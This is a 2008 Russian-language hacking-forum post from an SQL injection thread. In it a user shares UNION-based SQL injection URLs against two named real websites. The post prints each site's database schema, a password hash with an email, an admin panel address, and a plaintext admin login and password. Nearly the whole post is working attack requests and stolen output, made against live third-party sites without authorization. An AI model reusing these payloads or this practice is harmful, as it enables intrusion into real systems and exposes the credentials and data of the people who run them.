ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 10.08.2008, 00:32
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию
Qwazar,сорри,я просто,не увидел,Что ты хэшик вытащил...АА...я первее хэш вытащил))
Цитата:
Сообщение от Qwazar  
http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,table_name,4,5,6+from+informat ion_schema.tables--

user: presa_ge@localhost
dbname: presa_ge
version: 5.0.51
TAbles:
Цитата:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
menu_tree
news
page_types
user_group
users
--id
--user_username
--user_password
--user_firstname
--user_lastname
--user_email
--user_group
Цитата:
http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,column_name,4,5,6+from+informa tion_schema.columns+where+table_name=0x7573657273--
presa.ge:c1ab283404b71a940807009023a764bd:xx@XX.xx
******************************************
abs-tech.com
Цитата:
SQL-injection
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,2,3,4,5, 6
Цитата:
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,concat_w s(0x3a,version(),user()),3,4,5,6
Version:5.0.51-locaweb-log
User:abs_tech1@200.234.200.132
Цитата:
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,table_na me,3,4,5,6+from+information_schema.tables
Tables:
tb_fornecedores
tb_mais_informacoes
tb_noticias_arquivos
tb_tickers
tb_downloads
tb_links
tb_noticias
tb_produtos
tb_institucional
tb_menu
tb_novidades
tb_usuario
--email
--nivel
--id_usuario
--senha
--nome
Цитата:
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,concat_w s(0x3a,id_usuario,email,nivel,senha,nome),3,4,5,6+ from+tb_usuario
1:w3:1:radum123:W3 Criações
http://www.abs-tech.com/admin/
login:w3
password:radium123
Но я там оказался не одним из первых:
Последний раз редактировалось DDoSька; 10.08.2008 в 02:01..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ